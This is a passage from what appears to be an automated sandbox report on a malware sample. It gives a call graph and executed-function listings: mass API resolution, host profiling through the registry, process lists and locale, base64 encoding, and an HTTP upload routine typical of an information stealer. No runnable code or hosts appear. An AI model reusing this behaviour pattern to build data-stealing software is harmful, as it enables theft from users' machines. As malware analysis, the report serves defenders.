70388->71056 71110 40d6bb _EH_prolog 70388->71110 71222 40b8af _EH_prolog 70388->71222 70611 40f923 lstrcpy 70610->70611 70612 402128 70611->70612 70612->69595 70614 401081 70613->70614 70614->69586 70615->69595 70616->69595 70617->69595 70618->69595 70619->69578 70620->69561 70621->69571 70622->69560 70623->69561 70624->69546 70625->69561 70626->69531 70627->69561 70629 40f923 lstrcpy 70628->70629 70630 402142 70629->70630 70630->69521 70631->69532 70632->69571 70634 4104c0 70633->70634 70635 40f923 lstrcpy 70634->70635 70636 4104d0 70635->70636 70636->69620 70637->69624 70639 403a6d 70638->70639 70639->70639 70640 403a74 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 70639->70640 70649 40fb4d 70640->70649 70642 403ab6 lstrlenA 70650 40fb4d 70642->70650 70644 403ac6 InternetCrackUrlA 70645 403ae4 70644->70645 70645->69633 70646->69758 70648 40f995 70647->70648 70648->69682 70649->70642 70650->70644 70651->69767 70652->69946 70653->69948 70654->69950 70655->69952 70656->69956 70657->69958 70659 40626c LocalAlloc 70658->70659 70660 4058f9 70658->70660 70659->70660 70661 40627c CryptStringToBinaryA 70659->70661 70660->69811 70660->69822 70661->70660 70662 406293 LocalFree 70661->70662 70662->70660 70663->69966 70664->69974 70665->69985 70666->70016 70668 410461 RegQueryValueExA 70667->70668 70669 41047c CharToOemA 70667->70669 70668->70669 70669->70030 70672 411041 70671->70672 70673 411025 K32GetModuleFileNameExA CloseHandle 70671->70673 70674 40f923 lstrcpy 70672->70674 70673->70672 70675 411050 70674->70675 70675->70074 70801 40fbbd 70676->70801 70679 41067e RegOpenKeyExA 70680 410677 70679->70680 70681 41069e RegQueryValueExA 70679->70681 70680->70096 70681->70680 70683 4107e5 70682->70683 70684 4108ea 70683->70684 70685 4107ed CoSetProxyBlanket 70683->70685 70686 40f923 lstrcpy 70684->70686 70687 41081d 70685->70687 70688 4108fb 70686->70688 70687->70684 70689 410851 VariantInit 70687->70689 70688->70110 70690 410874 70689->70690 70807 4106c4 _EH_prolog CoCreateInstance 70690->70807 70692 410882 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 70693 40f923 lstrcpy 70692->70693 70694 4108de VariantClear 70693->70694 70694->70688 70696 41098e 70695->70696 70697 410996 CoSetProxyBlanket 70696->70697 70698 410a33 70696->70698 70700 4109c6 70697->70700 70699 40f923 lstrcpy 70698->70699 70701 410a44 70699->70701 70700->70698 70702 4109f2 VariantInit 70700->70702 70701->70124 70703 410a15 70702->70703 70813 410c8d LocalAlloc CharToOemW 70703->70813 70705 410a1d 70706 40f923 lstrcpy 70705->70706 70707 410a27 VariantClear 70706->70707 70707->70701 70709 40fc33 70708->70709 70709->70138 70710->70151 70712 40f923 lstrcpy 70711->70712 70713 41040d 70712->70713 70713->70166 70715 40f923 lstrcpy 70714->70715 70716 40fd0d GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 70715->70716 70717 40fdf8 70716->70717 70723 40fd48 70716->70723 70719 40fe00 LocalFree 70717->70719 70720 40fe09 70717->70720 70718 40fd4d GetLocaleInfoA 70718->70723 70719->70720 70720->70180 70721 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 70721->70723 70722 40f9e1 lstrcpy 70722->70723 70723->70717 70723->70718 70723->70721 70723->70722 70724->70193 70726 40fce0 70725->70726 70727 40fcc4 wsprintfA 70725->70727 70726->70208 70727->70726 70729 40fe73 70728->70729 70730 40fe5b RegQueryValueExA 70728->70730 70729->70226 70730->70729 70732 40ff06 GetLogicalProcessorInformationEx 70731->70732 70733 40ff11 70732->70733 70734 40fedc GetLastError 70732->70734 70816 410ade GetProcessHeap HeapFree 70733->70816 70735 40ff65 70734->70735 70736 40fee7 70734->70736 70739 40ff6f 70735->70739 70817 410ade GetProcessHeap HeapFree 70735->70817 70744 40feeb 70736->70744 70739->70240 70740 40ff38 70740->70739 70743 40ff3e wsprintfA 70740->70743 70743->70739 70744->70732 70745 40ff5e 70744->70745 70814 410ade GetProcessHeap HeapFree 70744->70814 70815 410afb GetProcessHeap HeapAlloc 70744->70815 70745->70739 70746->70253 70818 410aa7 70747->70818 70750 40ffc1 wsprintfA 70750->70267 70753 40f923 lstrcpy 70752->70753 70756 410010 70753->70756 70754 41004c EnumDisplayDevicesA 70755 410061 70754->70755 70754->70756 70755->70282 70756->70754 70756->70755 70757 40f997 2 API calls 70756->70757 70757->70756 70759 40f923 lstrcpy 70758->70759 70760 4102ed CreateToolhelp32Snapshot Process32First 70759->70760 70761 410386 CloseHandle 70760->70761 70764 41031e 70760->70764 70761->70295 70762 410372 Process32Next 70762->70761 70762->70764 70763 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 70763->70764 70764->70762 70764->70763 70765 40f9e1 lstrcpy 70764->70765 70765->70764 70767 40f923 lstrcpy 70766->70767 70768 410095 RegOpenKeyExA 70767->70768 70769 4100c8 70768->70769 70781 4100e7 70768->70781 70770 40f95a lstrcpy 70769->70770 70778 4100d4 70770->70778 70771 4100f0 RegEnumKeyExA 70772 410119 wsprintfA RegOpenKeyExA 70771->70772 70771->70781 70773 410283 70772->70773 70774 41015d RegQueryValueExA 70772->70774 70777 40f95a lstrcpy 70773->70777 70775 410187 lstrlenA 70774->70775 70774->70781 70775->70781 70776 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 70776->70781 70777->70778 70778->70309 70779 4101f2 RegQueryValueExA 70779->70781 70780 40f9e1 lstrcpy 70780->70781 70781->70771 70781->70773 70781->70776 70781->70779 70781->70780 70820 413460 _EH_prolog 70782->70820 70784 41445a 70785 40f9e1 lstrcpy 70784->70785 70786 41447c 70785->70786 70787 40f9e1 lstrcpy 70786->70787 70788 4144a0 70787->70788 70789 40f9e1 lstrcpy 70788->70789 70790 4144ac 70789->70790 70791 40f9e1 lstrcpy 70790->70791 70792 4144b8 70791->70792 70793 4144bf Sleep 70792->70793 70794 4144cf CreateThread WaitForSingleObject 70792->70794 70793->70792 70795 40f923 lstrcpy 70794->70795 70824 413326 _EH_prolog 70794->70824 70796 4144fd 70795->70796 70822 4134ac _EH_prolog 70796->70822 70798 414510 70799 401061 _EH_prolog 70798->70799 70800 41451c 70799->70800 70800->70331 70804 40fb50 GetProcessHeap HeapAlloc RegOpenKeyExA 70801->70804 70803 40fbc2 70803->70679 70803->70680 70805 40fb93 RegQueryValueExA 70804->70805 70806 40fbaa 70804->70806 70805->70806 70806->70803 70808 410758 70807->70808 70809 4106fa SysAllocString 70807->70809 70808->70692 70809->70808 70811 410709 70809->70811 70810 410751 SysFreeString 70810->70808 70811->70810 70812 410735 _wtoi64 SysFreeString 70811->70812 70812->70810 70813->70705 70814->70744 70815->70744 70816->70740 70817->70739 70819 40ffab GlobalMemoryStatusEx 70818->70819 70819->70750 70821 413479 70820->70821 70821->70784 70823 4134cc 70822->70823 70823->70798 70833 40fb4d 70824->70833 70826 413347 lstrlenA 70830 41335e 70826->70830 70832 413353 70826->70832 70827 40f95a lstrcpy 70827->70830 70829 40f9e1 lstrcpy 70829->70830 70830->70827 70830->70829 70831 413406 StrCmpCA 70830->70831 70834 4043ad _EH_prolog 70830->70834 70831->70830 70831->70832 70833->70826 70835 40f95a lstrcpy 70834->70835 70836 4043dd 70835->70836 70837 403a54 6 API calls 70836->70837 70838 4043e9 70837->70838 71039 410dac 70838->71039 70840 404415 70841 404420 lstrlenA 70840->70841 70842 404430 70841->70842 70843 410dac 4 API calls 70842->70843 70844 40443e 70843->70844 70845 40f923 lstrcpy 70844->70845 70846 40444e 70845->70846 70847 40f923 lstrcpy 70846->70847 70848 40445f 70847->70848 70849 40f923 lstrcpy 70848->70849 70850 404470 70849->70850 70851 40f923 lstrcpy 70850->70851 70852 404481 70851->70852 70853 40f923 lstrcpy 70852->70853 70854 404492 StrCmpCA 70853->70854 70856 4044ae 70854->70856 70855 4044d4 70857 410b5c 3 API calls 70855->70857 70856->70855 70858 4044c3 InternetOpenA 70856->70858 70859 4044df 70857->70859 70858->70855 70869 404cf2 70858->70869 70860 40fa28 3 API calls 70859->70860 70861 4044f5 70860->70861 70862 40f9e1 lstrcpy 70861->70862 70863 404502 70862->70863 70864 40fa9c 4 API calls 70863->70864 70865 40452e 70864->70865 70866 40fa28 3 API calls 70865->70866 70867 404544 70866->70867 70871 40f95a lstrcpy 70869->70871 70882 404c4e 70871->70882 70882->70830 71040 410dbd CryptBinaryToStringA 71039->71040 71041 410db9 71039->71041 71040->71041 71042 410dda GetProcessHeap HeapAlloc 71040->71042 71041->70840 71042->71041 71043 410df7 CryptBinaryToStringA 71042->71043 71043->71041 71052->70340 71412 4060a4 71053->71412 71055 4060ea 71055->70388 71413 4060af 71412->71413 71416 405f70 71413->71416 71415 4060c0 71415->71055 71419 405e09 71416->71419 71420 405e22 71419->71420 71432 405e1a 71419->71432 71435 4059a0 71420->71435 71432->71415 71437 4059af 71435->71437 71436 4059b6 71436->71432 71441 405a53 71436->71441 71437->71436 71438 405a06 71437->71438 71462 410afb GetProcessHeap HeapAlloc 71438->71462 72560 4138e7 72561 4138f2 72560->72561 72562 401061 _EH_prolog 72561->72562 72563 4138fe 72562->72563 72564 6c7eb694 72565 6c7eb6a0 ___scrt_is_nonwritable_in_current_image 72564->72565 72594 6c7eaf2a 72565->72594 72567 6c7eb6a7 72568 6c7eb796 72567->72568 72569 6c7eb6d1 72567->72569 72580 6c7eb6ac ___scrt_is_nonwritable_in_current_image 72567->72580 72611 6c7eb1f7 IsProcessorFeaturePresent 72568->72611 72598 6c7eb064 72569->72598 72572 6c7eb6e0 __RTC_Initialize 72572->72580 72601 6c7ebf89 InitializeSListHead 72572->72601 72573 6c7eb7b3 ___scrt_uninitialize_crt __RTC_Initialize 72575 6c7eb6ee ___scrt_initialize_default_local_stdio_options 72577 6c7eb6f3 _initterm_e 72575->72577 72576 6c7eb79d ___scrt_is_nonwritable_in_current_image 72576->72573 72578 6c7eb828 72576->72578 72579 6c7eb7d2 72576->72579 72577->72580 72581 6c7eb708 72577->72581 72582 6c7eb1f7 ___scrt_fastfail 6 API calls 72578->72582 72615 6c7eb09d _execute_onexit_table _cexit ___scrt_release_startup_lock 72579->72615 72602 6c7eb072 72581->72602 72585 6c7eb82f 72582->72585 72590 6c7eb86e dllmain_crt_process_detach 72585->72590 72591 6c7eb83b 72585->72591 72586 6c7eb7d7 72616 6c7ebf95 __std_type_info_destroy_list 72586->72616 72587 6c7eb70d 72587->72580 72589 6c7eb711 _initterm 72587->72589 72589->72580 72593 6c7eb840 72590->72593 72592 6c7eb860 dllmain_crt_process_attach 72591->72592 72591->72593 72592->72593 72595 6c7eaf33 72594->72595 72617 6c7eb341 IsProcessorFeaturePresent 72595->72617 72597 6c7eaf3f ___scrt_uninitialize_crt 72597->72567 72618 6c7eaf8b 72598->72618 72600 6c7eb06b 72600->72572 72601->72575 72603 6c7eb077 ___scrt_release_startup_lock 72602->72603 72604 6c7eb07b 72603->72604 72606 6c7eb082 72603->72606 72628 6c7eb341 IsProcessorFeaturePresent 72604->72628 72608 6c7eb087 _configure_narrow_argv 72606->72608 72607 6c7eb080 72607->72587 72609 6c7eb095 _initialize_narrow_environment 72608->72609 72610 6c7eb092 72608->72610 72609->72607 72610->72587 72612 6c7eb20c ___scrt_fastfail 72611->72612 72613 6c7eb218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 72612->72613 72614 6c7eb302 ___scrt_fastfail 72613->72614 72614->72576 72615->72586 72616->72573 72617->72597 72619 6c7eaf9e 72618->72619 72620 6c7eaf9a 72618->72620 72621 6c7eb028 72619->72621 72623 6c7eafab ___scrt_release_startup_lock 72619->72623 72620->72600 72622 6c7eb1f7 ___scrt_fastfail 6 API calls 72621->72622 72624 6c7eb02f 72622->72624 72625 6c7eafb8 _initialize_onexit_table 72623->72625 72626 6c7eafd6 72623->72626 72625->72626 72627 6c7eafc7 _initialize_onexit_table 72625->72627 72626->72600 72627->72626 72628->72607 72629 6c7b3060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 72634 6c7eab2a 72629->72634 72633 6c7b30db 72638 6c7eae0c _crt_atexit _register_onexit_function 72634->72638 72636 6c7b30cd 72637 6c7eb320 5 API calls ___raise_securityfailure 72636->72637 72637->72633 72638->72636 72639 6c7b35a0 72640 6c7b35c4 InitializeCriticalSectionAndSpinCount getenv 72639->72640 72655 6c7b3846 __aulldiv 72639->72655 72642 6c7b38fc strcmp 72640->72642 72652 6c7b35f3 __aulldiv 72640->72652 72644 6c7b3912 strcmp 72642->72644 72642->72652 72643 6c7b38f4 72644->72652 72645 6c7b35f8 QueryPerformanceFrequency 72645->72652 72646 6c7b3622 _strnicmp 72648 6c7b3944 _strnicmp 72646->72648 72646->72652 72647 6c7b376a QueryPerformanceCounter EnterCriticalSection 72649 6c7b37b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 72647->72649 72653 6c7b375c 72647->72653 72650 6c7b395d 72648->72650 72648->72652 72649->72653 72654 6c7b37fc LeaveCriticalSection 72649->72654 72651 6c7b3664 GetSystemTimeAdjustment 72651->72652 72652->72645 72652->72646 72652->72648 72652->72650 72652->72651 72652->72653 72653->72647 72653->72649 72653->72654 72653->72655 72654->72653 72654->72655 72656 6c7eb320 5 API calls ___raise_securityfailure 72655->72656 72656->72643 72657 6c7cc930 GetSystemInfo VirtualAlloc 72658 6c7cc9a3 GetSystemInfo 72657->72658 72665 6c7cc973 72657->72665 72660 6c7cc9b6 72658->72660 72661 6c7cc9d0 72658->72661 72660->72661 72663 6c7cc9bd 72660->72663 72664 6c7cc9d8 VirtualAlloc 72661->72664 72661->72665 72662 6c7cc99b 72663->72665 72666 6c7cc9c1 VirtualFree 72663->72666 72667 6c7cc9ec 72664->72667 72668 6c7cc9f0 72664->72668 72673 6c7eb320 5 API calls ___raise_securityfailure 72665->72673 72666->72665 72667->72665 72674 6c7ecbe8 GetCurrentProcess TerminateProcess 72668->72674 72673->72662 72675 6c7eb830 72676 6c7eb86e dllmain_crt_process_detach 72675->72676 72677 6c7eb83b 72675->72677 72679 6c7eb840 72676->72679 72678 6c7eb860 dllmain_crt_process_attach 72677->72678 72677->72679 72678->72679 72680 6c7eb9c0 72681 6c7eb9ce dllmain_dispatch 72680->72681 72682 6c7eb9c9 72680->72682 72684 6c7ebef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 72682->72684 72684->72681

                                                                                Executed Functions

                                                                                Function 00417645 Relevance: 207.0, APIs: 114, Strings: 4, Instructions: 490libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(75900000,00416AAC), ref: 00417659
                                                                                • GetProcAddress.KERNEL32 ref: 00417670
                                                                                • GetProcAddress.KERNEL32 ref: 00417687
                                                                                • GetProcAddress.KERNEL32 ref: 0041769E
                                                                                • GetProcAddress.KERNEL32 ref: 004176B5
                                                                                • GetProcAddress.KERNEL32 ref: 004176CC
                                                                                • GetProcAddress.KERNEL32 ref: 004176E3
                                                                                • GetProcAddress.KERNEL32 ref: 004176FA
                                                                                • GetProcAddress.KERNEL32 ref: 00417711
                                                                                • GetProcAddress.KERNEL32 ref: 00417728
                                                                                • GetProcAddress.KERNEL32 ref: 0041773F
                                                                                • GetProcAddress.KERNEL32 ref: 00417756
                                                                                • GetProcAddress.KERNEL32 ref: 0041776D
                                                                                • GetProcAddress.KERNEL32 ref: 00417784
                                                                                • GetProcAddress.KERNEL32 ref: 0041779B
                                                                                • GetProcAddress.KERNEL32 ref: 004177B2
                                                                                • GetProcAddress.KERNEL32 ref: 004177C9
                                                                                • GetProcAddress.KERNEL32 ref: 004177E0
                                                                                • GetProcAddress.KERNEL32 ref: 004177F7
                                                                                • GetProcAddress.KERNEL32 ref: 0041780E
                                                                                • GetProcAddress.KERNEL32 ref: 00417825
                                                                                • GetProcAddress.KERNEL32 ref: 0041783C
                                                                                • GetProcAddress.KERNEL32 ref: 00417853
                                                                                • GetProcAddress.KERNEL32 ref: 0041786A
                                                                                • GetProcAddress.KERNEL32 ref: 00417881
                                                                                • GetProcAddress.KERNEL32 ref: 00417898
                                                                                • GetProcAddress.KERNEL32 ref: 004178AF
                                                                                • GetProcAddress.KERNEL32 ref: 004178C6
                                                                                • GetProcAddress.KERNEL32 ref: 004178DD
                                                                                • GetProcAddress.KERNEL32 ref: 004178F4
                                                                                • GetProcAddress.KERNEL32 ref: 0041790B
                                                                                • GetProcAddress.KERNEL32 ref: 00417922
                                                                                • GetProcAddress.KERNEL32 ref: 00417939
                                                                                • GetProcAddress.KERNEL32 ref: 00417950
                                                                                • GetProcAddress.KERNEL32 ref: 00417967
                                                                                • GetProcAddress.KERNEL32 ref: 0041797E
                                                                                • GetProcAddress.KERNEL32 ref: 00417995
                                                                                • GetProcAddress.KERNEL32 ref: 004179AC
                                                                                • GetProcAddress.KERNEL32 ref: 004179C3
                                                                                • GetProcAddress.KERNEL32 ref: 004179DA
                                                                                • GetProcAddress.KERNEL32 ref: 004179F1
                                                                                • GetProcAddress.KERNEL32 ref: 00417A08
                                                                                • GetProcAddress.KERNEL32 ref: 00417A1F
                                                                                • LoadLibraryA.KERNEL32(00416AAC,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064,004135E9,00413626,?,00000024,00000064,Function_000135AC,00413295), ref: 00417A30
                                                                                • LoadLibraryA.KERNEL32 ref: 00417A41
                                                                                • LoadLibraryA.KERNEL32 ref: 00417A52
                                                                                • LoadLibraryA.KERNEL32 ref: 00417A63
                                                                                • LoadLibraryA.KERNEL32 ref: 00417A74
                                                                                • LoadLibraryA.KERNEL32 ref: 00417A85
                                                                                • LoadLibraryA.KERNEL32 ref: 00417A96
                                                                                • LoadLibraryA.KERNEL32 ref: 00417AA7
                                                                                • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00417AB7
                                                                                • GetProcAddress.KERNEL32(75FD0000), ref: 00417AD2
                                                                                • GetProcAddress.KERNEL32 ref: 00417AE9
                                                                                • GetProcAddress.KERNEL32 ref: 00417B00
                                                                                • GetProcAddress.KERNEL32 ref: 00417B17
                                                                                • GetProcAddress.KERNEL32 ref: 00417B2E
                                                                                • GetProcAddress.KERNEL32(734B0000), ref: 00417B4D
                                                                                • GetProcAddress.KERNEL32 ref: 00417B64
                                                                                • GetProcAddress.KERNEL32 ref: 00417B7B
                                                                                • GetProcAddress.KERNEL32 ref: 00417B92
                                                                                • GetProcAddress.KERNEL32 ref: 00417BA9
                                                                                • GetProcAddress.KERNEL32 ref: 00417BC0
                                                                                • GetProcAddress.KERNEL32 ref: 00417BD7
                                                                                • GetProcAddress.KERNEL32 ref: 00417BEE
                                                                                • GetProcAddress.KERNEL32(763B0000), ref: 00417C09
                                                                                • GetProcAddress.KERNEL32 ref: 00417C20
                                                                                • GetProcAddress.KERNEL32 ref: 00417C37
                                                                                • GetProcAddress.KERNEL32 ref: 00417C4E
                                                                                • GetProcAddress.KERNEL32 ref: 00417C65
                                                                                • GetProcAddress.KERNEL32(750F0000), ref: 00417C84
                                                                                • GetProcAddress.KERNEL32 ref: 00417C9B
                                                                                • GetProcAddress.KERNEL32 ref: 00417CB2
                                                                                • GetProcAddress.KERNEL32 ref: 00417CC9
                                                                                • GetProcAddress.KERNEL32 ref: 00417CE0
                                                                                • GetProcAddress.KERNEL32 ref: 00417CF7
                                                                                • GetProcAddress.KERNEL32(75A50000), ref: 00417D16
                                                                                • GetProcAddress.KERNEL32 ref: 00417D2D
                                                                                • GetProcAddress.KERNEL32 ref: 00417D44
                                                                                • GetProcAddress.KERNEL32 ref: 00417D5B
                                                                                • GetProcAddress.KERNEL32 ref: 00417D72
                                                                                • GetProcAddress.KERNEL32 ref: 00417D89
                                                                                • GetProcAddress.KERNEL32 ref: 00417DA0
                                                                                • GetProcAddress.KERNEL32 ref: 00417DB7
                                                                                • GetProcAddress.KERNEL32 ref: 00417DCE
                                                                                • GetProcAddress.KERNEL32(75070000), ref: 00417DE9
                                                                                • GetProcAddress.KERNEL32 ref: 00417E00
                                                                                • GetProcAddress.KERNEL32 ref: 00417E17
                                                                                • GetProcAddress.KERNEL32 ref: 00417E2E
                                                                                • GetProcAddress.KERNEL32 ref: 00417E45
                                                                                • GetProcAddress.KERNEL32(74E50000), ref: 00417E60
                                                                                • GetProcAddress.KERNEL32 ref: 00417E77
                                                                                • GetProcAddress.KERNEL32(75320000), ref: 00417E92
                                                                                • GetProcAddress.KERNEL32 ref: 00417EA9
                                                                                • GetProcAddress.KERNEL32(6F080000), ref: 00417EC8
                                                                                • GetProcAddress.KERNEL32 ref: 00417EDF
                                                                                • GetProcAddress.KERNEL32 ref: 00417EF6
                                                                                • GetProcAddress.KERNEL32 ref: 00417F0D
                                                                                • GetProcAddress.KERNEL32 ref: 00417F24
                                                                                • GetProcAddress.KERNEL32 ref: 00417F3B
                                                                                • GetProcAddress.KERNEL32 ref: 00417F52
                                                                                • GetProcAddress.KERNEL32 ref: 00417F69
                                                                                • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00417F7F
                                                                                • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00417F95
                                                                                • GetProcAddress.KERNEL32(74E00000), ref: 00417FB0
                                                                                • GetProcAddress.KERNEL32 ref: 00417FC7
                                                                                • GetProcAddress.KERNEL32 ref: 00417FDE
                                                                                • GetProcAddress.KERNEL32 ref: 00417FF5
                                                                                • GetProcAddress.KERNEL32(74DF0000), ref: 00418010
                                                                                • GetProcAddress.KERNEL32(6E340000), ref: 0041802B
                                                                                • GetProcAddress.KERNEL32 ref: 00418042
                                                                                • GetProcAddress.KERNEL32 ref: 00418059
                                                                                • GetProcAddress.KERNEL32 ref: 00418070
                                                                                • GetProcAddress.KERNEL32(6CB30000,SymMatchString), ref: 0041808A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                • API String ID: 2238633743-951535364
                                                                                • Opcode ID: 03224874fb45e6c46fb278b45bf30394fb78a2bdfedb5a718972308c7089d793
                                                                                • Instruction ID: b1e844fb62b820e65f219bf097f7cac9561447c547020423e5517cd844e2ca6b
                                                                                • Opcode Fuzzy Hash: 03224874fb45e6c46fb278b45bf30394fb78a2bdfedb5a718972308c7089d793
                                                                                • Instruction Fuzzy Hash: 3D42D97E811620EFEB929FA0FD48A653BB3F70AB01B147439FA0586231D7364865EF54
                                                                                Function 0040514C Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 640networkstringmemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 605 40514c-40521b _EH_prolog call 40f95a call 403a54 call 40f923 * 5 call 40fb4d InternetOpenA StrCmpCA 622 40521d 605->622 623 40521f-405222 605->623 622->623 624 4058d8-4058fe InternetCloseHandle call 40fb4d call 406242 623->624 625 405228-4053a6 call 410b5c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 2 InternetConnectA 623->625 634 405900-40592d call 40f997 call 40fa9c call 40f9e1 call 40f98e 624->634 635 405932-40599f call 410a94 * 2 call 40f98e * 4 call 401061 call 40f98e 624->635 625->624 705 4053ac-4053dd HttpOpenRequestA 625->705 634->635 706 4053e3-4053e5 705->706 707 4058cf-4058d2 InternetCloseHandle 705->707 708 4053e7-4053f7 InternetSetOptionA 706->708 709 4053fd-405875 call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4020f3 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fb4d lstrlenA call 40fb4d lstrlenA GetProcessHeap HeapAlloc call 40fb4d lstrlenA call 40fb4d memcpy call 40fb4d lstrlenA call 40fb4d * 2 lstrlenA memcpy call 40fb4d lstrlenA call 40fb4d HttpSendRequestA 706->709 707->624 708->709 868 4058b1-4058c6 InternetReadFile 709->868 869 405877-40587c 868->869 870 4058c8-4058c9 InternetCloseHandle 868->870 869->870 871 40587e-4058ac call 40fa9c call 40f9e1 call 40f98e 869->871 870->707 871->868
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00405151
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                  • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                  • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040539B
                                                                                • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004053D2
                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00425B20,00000000), ref: 004057CC
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004057DD
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004057E7
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004057EE
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004057FF
                                                                                • memcpy.MSVCRT ref: 00405810
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00405821
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040583A
                                                                                • memcpy.MSVCRT ref: 00405843
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405856
                                                                                • HttpSendRequestA.WININET(?,00000000,00000000), ref: 0040586A
                                                                                • InternetReadFile.WININET(?,?,000000C7,?), ref: 004058BE
                                                                                • InternetCloseHandle.WININET(?), ref: 004058C9
                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004053F7
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
